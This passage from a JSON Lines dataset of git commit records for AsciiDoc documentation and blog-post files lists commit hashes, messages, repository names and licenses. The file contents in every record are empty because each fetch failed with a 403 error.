Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-04-Apple-iPhone-4S-Keynote-Review.adoc","new_file":"_posts\/2011-10-04-Apple-iPhone-4S-Keynote-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bb2c28287da97e7825f2ae5837b2e2f4fe5c259","subject":"Update 2015-11-21-Application-Startup-Time.adoc","message":"Update 2015-11-21-Application-Startup-Time.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-11-21-Application-Startup-Time.adoc","new_file":"_posts\/2015-11-21-Application-Startup-Time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"133966171e83f91f70f810b07b31c7717e1b01df","subject":"Update 2016-12-08-Dealing-with-merge-chaos.adoc","message":"Update 2016-12-08-Dealing-with-merge-chaos.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-12-08-Dealing-with-merge-chaos.adoc","new_file":"_posts\/2016-12-08-Dealing-with-merge-chaos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73b9608c30475a8bdb858ebf07805b3006d4780c","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff57fd208b4591d2998c80b6b9bac95c9934193","subject":"Update 2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","message":"Update 2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","new_file":"_posts\/2012-08-05-Mocker-un-serveur-de-mail-avec-Dumbster-et-J-Uit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b028fb0c523bf261eca3c33794e68b52adfcd42c","subject":"Update 2017-05-20-How-to-clean-a-docker-registry-v2.adoc","message":"Update 2017-05-20-How-to-clean-a-docker-registry-v2.adoc","repos":"gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english,gbougeard\/blog.english","old_file":"_posts\/2017-05-20-How-to-clean-a-docker-registry-v2.adoc","new_file":"_posts\/2017-05-20-How-to-clean-a-docker-registry-v2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gbougeard\/blog.english.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ee6759e4cc96acb230113d9991c4d0218c8e78b","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2172e274f538e331a87461b1349b26f9a871949e","subject":"Added setOutHeader EIP docs","message":"Added setOutHeader EIP docs\n","repos":"apache\/camel,tdiesler\/camel,zregvart\/camel,onders86\/camel,jonmcewen\/camel,gautric\/camel,alvinkwekel\/camel,tadayosi\/camel,curso007\/camel,jonmcewen\/camel,christophd\/camel,tdiesler\/camel,cunningt\/camel,dmvolod\/camel,alvinkwekel\/camel,kevinearls\/camel,alvinkwekel\/camel,adessaigne\/camel,DariusX\/camel,CodeSmell\/camel,cunningt\/camel,akhettar\/camel,Fabryprog\/camel,ullgren\/camel,tadayosi\/camel,objectiser\/camel,davidkarlsen\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,snurmine\/camel,zregvart\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,gnodet\/camel,tdiesler\/camel,kevinearls\/camel,curso007\/camel,jamesnetherton\/camel,tadayosi\/camel,gautric\/camel,nikhilvibhav\/camel,mcollovati\/camel,ullgren\/camel,objectiser\/camel,ullgren\/camel,anoordover\/camel,dmvolod\/camel,Fabryprog\/camel,adessaigne\/camel,akhettar\/camel,davidkarlsen\/camel,DariusX\/camel,adessaigne\/camel,pmoerenhout\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,snurmine\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,sverkera\/camel,CodeSmell\/camel,Fabryprog\/camel,kevinearls\/camel,akhettar\/camel,ullgren\/camel,pax95\/camel,onders86\/camel,apache\/camel,pax95\/camel,gautric\/camel,gautric\/camel,jamesnetherton\/camel,nicolaferraro\/camel,dmvolod\/camel,pax95\/camel,christophd\/camel,curso007\/camel,cunningt\/camel,gnodet\/camel,akhettar\/camel,DariusX\/camel,jonmcewen\/camel,pmoerenhout\/camel,davidkarlsen\/camel,snurmine\/camel,pax95\/camel,alvinkwekel\/camel,pmoerenhout\/camel,sverkera\/camel,jamesnetherton\/camel,christophd\/camel,snurmine\/camel,pax95\/camel,jamesnetherton\/camel,apache\/camel,mcollovati\/camel,snurmine\/camel,objectiser\/camel,gnodet\/camel,mcollovati\/camel,akhettar\/camel,sverkera\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,onders86\/camel,nikhilvibhav\/camel,objectiser\/camel,sverkera\/camel,curso007\/camel,gautric\/camel,anoordover\/camel,snurmine\/camel,dmvolod\/camel,onders86\/camel,kevinearls\/camel,apache\/camel,pmoerenhout\/camel,anoordover\/camel,apache\/camel,curso007\/camel,jonmcewen\/camel,kevinearls\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,dmvolod\/camel,jamesnetherton\/camel,tadayosi\/camel,onders86\/camel,DariusX\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,gautric\/camel,kevinearls\/camel,Fabryprog\/camel,zregvart\/camel,anoordover\/camel,dmvolod\/camel,punkhorn\/camel-upstream,sverkera\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,adessaigne\/camel,jonmcewen\/camel,nikhilvibhav\/camel,cunningt\/camel,curso007\/camel,mcollovati\/camel,zregvart\/camel,gnodet\/camel,adessaigne\/camel,nicolaferraro\/camel,onders86\/camel,sverkera\/camel,tdiesler\/camel,anoordover\/camel,christophd\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setOutHeader-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setOutHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76bd9e6fa9a606eda9979b17e2b50316be4be7a0","subject":"Update 2015-08-19-Challenger-Analysing-the-File-Format.adoc","message":"Update 2015-08-19-Challenger-Analysing-the-File-Format.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-19-Challenger-Analysing-the-File-Format.adoc","new_file":"_posts\/2015-08-19-Challenger-Analysing-the-File-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reversergeek\/reversergeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65496939c9e60ed6721b609e90e7eb970a8d42ed","subject":"y2b create post Is This The Best Headphone Deal Ever?","message":"y2b create post Is This The Best Headphone Deal Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-30-Is-This-The-Best-Headphone-Deal-Ever.adoc","new_file":"_posts\/2016-12-30-Is-This-The-Best-Headphone-Deal-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0c701bfc6c35a264ed03273bafde5db07779de1","subject":"2016-07-07-Anecdotes.adoc","message":"2016-07-07-Anecdotes.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-07-Anecdotes.adoc","new_file":"_posts\/2016-07-07-Anecdotes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7938709592c004e0116f8222303fba12c481e3f1","subject":"Documentation: add Groovy Ant Task","message":"Documentation: add Groovy Ant Task\n","repos":"tkruse\/incubator-groovy,paulk-asert\/groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,paplorinc\/incubator-groovy,antoaravinth\/incubator-groovy,bsideup\/incubator-groovy,christoph-frick\/groovy-core,groovy\/groovy-core,bsideup\/groovy-core,jwagenleitner\/groovy,kenzanmedia\/incubator-groovy,bsideup\/incubator-groovy,pickypg\/incubator-groovy,armsargis\/groovy,PascalSchumacher\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/incubator-groovy,apache\/groovy,groovy\/groovy-core,samanalysis\/incubator-groovy,groovy\/groovy-core,dpolivaev\/groovy,taoguan\/incubator-groovy,alien11689\/groovy-core,avafanasiev\/groovy,aaronzirbes\/incubator-groovy,bsideup\/groovy-core,armsargis\/groovy,sagarsane\/incubator-groovy,eginez\/incubator-groovy,ebourg\/groovy-core,taoguan\/incubator-groovy,avafanasiev\/groovy,rabbitcount\/incubator-groovy,christoph-frick\/groovy-core,gillius\/incubator-groovy,pickypg\/incubator-groovy,russel\/incubator-groovy,sagarsane\/incubator-groovy,fpavageau\/groovy,christoph-frick\/groovy-core,bsideup\/incubator-groovy,groovy\/groovy-core,aim-for-better\/incubator-groovy,samanalysis\/incubator-groovy,kenzanmedia\/incubator-groovy,dpolivaev\/groovy,traneHead\/groovy-core,bsideup\/groovy-core,alien11689\/incubator-groovy,sagarsane\/incubator-groovy,shils\/incubator-groovy,alien11689\/groovy-core,shils\/incubator-groovy,adjohnson916\/groovy-core,pickypg\/incubator-groovy,PascalSchumacher\/incubator-groovy,ebourg\/groovy-core,tkruse\/incubator-groovy,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,rabbitcount\/incubator-groovy,rabbitcount\/incubator-groovy,bsideup\/incubator-groovy,alien11689\/incubator-groovy,ebourg\/incubator-groovy,sagarsane\/incubator-groovy,gillius\/incubator-groovy,shils\/groovy,alien11689\/groovy-core,russel\/groovy,paulk-asert\/groovy,PascalSchumacher\/incubator-groovy,PascalSchumacher\/incubator-groovy,apache\/incubator-groovy,aaronzirbes\/incubator-groovy,nobeans\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,jwagenleitner\/incubator-groovy,eginez\/incubator-groovy,i55ac\/incubator-groovy,guangying945\/incubator-groovy,graemerocher\/incubator-groovy,guangying945\/incubator-groovy,apache\/incubator-groovy,eginez\/incubator-groovy,gillius\/incubator-groovy,ChanJLee\/incubator-groovy,EPadronU\/incubator-groovy,aaronzirbes\/incubator-groovy,mariogarcia\/groovy-core,bsideup\/groovy-core,pledbrook\/incubator-groovy,nkhuyu\/incubator-groovy,nobeans\/incubator-groovy,kidaa\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,nobeans\/incubator-groovy,mariogarcia\/groovy-core,alien11689\/groovy-core,alien11689\/groovy-core,rlovtangen\/groovy-core,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,upadhyayap\/incubator-groovy,EPadronU\/incubator-groovy,groovy\/groovy-core,pledbrook\/incubator-groovy,upadhyayap\/incubator-groovy,kidaa\/incubator-groovy,shils\/groovy,tkruse\/incubator-groovy,apache\/groovy,EPadronU\/incubator-groovy,jwagenleitner\/incubator-groovy,antoaravinth\/incubator-groovy,shils\/incubator-groovy,fpavageau\/groovy,graemerocher\/incubator-groovy,adjohnson916\/groovy-core,avafanasiev\/groovy,rlovtangen\/groovy-core,kidaa\/incubator-groovy,nobeans\/incubator-groovy,apache\/incubator-groovy,gillius\/incubator-groovy,russel\/incubator-groovy,graemerocher\/incubator-groovy,adjohnson916\/incubator-groovy,guangying945\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,rlovtangen\/groovy-core,traneHead\/groovy-core,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,i55ac\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,pledbrook\/incubator-groovy,shils\/incubator-groovy,sagarsane\/groovy-core,paulk-asert\/incubator-groovy,fpavageau\/groovy,yukangguo\/incubator-groovy,nkhuyu\/incubator-groovy,kenzanmedia\/incubator-groovy,yukangguo\/incubator-groovy,fpavageau\/groovy,shils\/groovy,adjohnson916\/incubator-groovy,adjohnson916\/incubator-groovy,avafanasiev\/groovy,apache\/groovy,paplorinc\/incubator-groovy,i55ac\/incubator-groovy,upadhyayap\/incubator-groovy,christoph-frick\/groovy-core,paplorinc\/incubator-groovy,ebourg\/groovy-core,antoaravinth\/incubator-groovy,jwagenleitner\/groovy,adjohnson916\/incubator-groovy,sagarsane\/groovy-core,aim-for-better\/incubator-groovy,aim-for-better\/incubator-groovy,EPadronU\/incubator-groovy,ebourg\/incubator-groovy,yukangguo\/incubator-groovy,traneHead\/groovy-core,paulk-asert\/groovy,paulk-asert\/incubator-groovy,rlovtangen\/groovy-core,PascalSchumacher\/incubator-groovy,ChanJLee\/incubator-groovy,ebourg\/incubator-groovy,genqiang\/incubator-groovy,russel\/incubator-groovy,upadhyayap\/incubator-groovy,apache\/groovy,taoguan\/incubator-groovy,kidaa\/incubator-groovy,russel\/groovy,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,kenzanmedia\/incubator-groovy,mariogarcia\/groovy-core,russel\/incubator-groovy,i55ac\/incubator-groovy,dpolivaev\/groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,genqiang\/incubator-groovy,mariogarcia\/groovy-core,antoaravinth\/incubator-groovy,jwagenleitner\/groovy,samanalysis\/incubator-groovy,yukangguo\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/incubator-groovy,nkhuyu\/incubator-groovy,rabbitcount\/incubator-groovy,apache\/incubator-groovy,ChanJLee\/incubator-groovy,nkhuyu\/incubator-groovy,rlovtangen\/groovy-core,genqiang\/incubator-groovy,ebourg\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/groovy,russel\/groovy,guangying945\/incubator-groovy,mariogarcia\/groovy-core,pickypg\/incubator-groovy,taoguan\/incubator-groovy,samanalysis\/incubator-groovy,sagarsane\/groovy-core,adjohnson916\/groovy-core,armsargis\/groovy,aim-for-better\/incubator-groovy,shils\/groovy","old_file":"subprojects\/groovy-ant\/src\/spec\/doc\/groovy-ant-task.adoc","new_file":"subprojects\/groovy-ant\/src\/spec\/doc\/groovy-ant-task.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57f2b744a0caf440f2d58090029846cb12ac1502","subject":"Add RealmImport CR docs (#11037)","message":"Add RealmImport CR docs (#11037)\n\n","repos":"abstractj\/keycloak,ahus1\/keycloak,raehalme\/keycloak,stianst\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,abstractj\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,keycloak\/keycloak,keycloak\/keycloak,reneploetz\/keycloak,srose\/keycloak,reneploetz\/keycloak,stianst\/keycloak,ahus1\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,srose\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,srose\/keycloak,keycloak\/keycloak,srose\/keycloak,ahus1\/keycloak,srose\/keycloak,ahus1\/keycloak,stianst\/keycloak,stianst\/keycloak,jpkrohling\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/realm-import.adoc","new_file":"docs\/guides\/src\/main\/operator\/realm-import.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2341af88dd5eca8edf0f318d09105a9c54ce7da","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b853109ea3356a7aa39495957fd4afd7afa87d1","subject":"Update 2016-12-21-Non-stop.adoc","message":"Update 2016-12-21-Non-stop.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2016-12-21-Non-stop.adoc","new_file":"_posts\/2016-12-21-Non-stop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48d785161d5ab8c31952a944a688a971ddb32246","subject":"Update 2019-01-14-bash-D-B.adoc","message":"Update 2019-01-14-bash-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-14-bash-D-B.adoc","new_file":"_posts\/2019-01-14-bash-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6353412dad6c9c78d199b3cf6e085b997f842ce","subject":"DELTASPIKE-941 JPA link broken in Data Module documentation","message":"DELTASPIKE-941 JPA link broken in Data Module documentation\n","repos":"apache\/deltaspike,rdicroce\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,idontgotit\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,struberg\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,subaochen\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,chkal\/deltaspike,os890\/DS_Discuss,danielsoro\/deltaspike,mlachat\/deltaspike,Danny02\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,os890\/deltaspike-vote,Danny02\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,danielsoro\/deltaspike,rdicroce\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike,chkal\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,apache\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,idontgotit\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,danielsoro\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/data.adoc","new_file":"documentation\/src\/main\/asciidoc\/data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"044b8243ddd847147938da406eb56e2b509d6517","subject":"Create Main.adoc","message":"Create Main.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/Main.adoc","new_file":"wiki\/Main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"952858d16d11eb5b562776318ee31a161a3b6b25","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5505bcd8c6355d077cf1e2ec3d8f74fa454dd535","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d65b05ef3f26d0d29765d8b0ee02be4ae98f1dd","subject":"y2b create post The Ultimate Controller Modification","message":"y2b create post The Ultimate Controller Modification","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-19-The-Ultimate-Controller-Modification.adoc","new_file":"_posts\/2016-11-19-The-Ultimate-Controller-Modification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a62a287cce5a016a8e12ee81c65ddb2d156df5e9","subject":"Update 2016-04-22-Innovation-versus-technological-debt.adoc","message":"Update 2016-04-22-Innovation-versus-technological-debt.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-22-Innovation-versus-technological-debt.adoc","new_file":"_posts\/2016-04-22-Innovation-versus-technological-debt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3f7767c14ae35348219ec3fe6800b21cbc2dc3c","subject":"updating the quick start guide","message":"updating the quick start guide","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"9485c88c3d1449395f941b7e5399f77da99930a5","subject":"y2b create post Does It Suck? - Strange Neck Speaker","message":"y2b create post Does It Suck? - Strange Neck Speaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-23-Does-It-Suck--Strange-Neck-Speaker.adoc","new_file":"_posts\/2015-07-23-Does-It-Suck--Strange-Neck-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44d9afa558df5190018d2093f8a2ff26e33a0eae","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c580c34a9cc17f56712b15028c2b88497d8417","subject":"Update 2015-09-15-Template.adoc","message":"Update 2015-09-15-Template.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-15-Template.adoc","new_file":"_posts\/2015-09-15-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c43224797d739a3e574d98381009592cdcd9b4e","subject":"Update 2020-02-04-SSE-SIMD.adoc","message":"Update 2020-02-04-SSE-SIMD.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-04-SSE-SIMD.adoc","new_file":"_posts\/2020-02-04-SSE-SIMD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47d28c8f849a3efaeafdfa45de74187e6e729fe6","subject":"Added Herb Sutter advice to the draft","message":"Added Herb Sutter advice to the draft\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"157565551992c3aa7c3a242b1bad33a40b40a0d4","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d95d6b7f5d044066bdcdd064824cd6e14a14db9","subject":"Update 2017-05-06-Bulk-Upload-in-Google-Cloudspanner.adoc","message":"Update 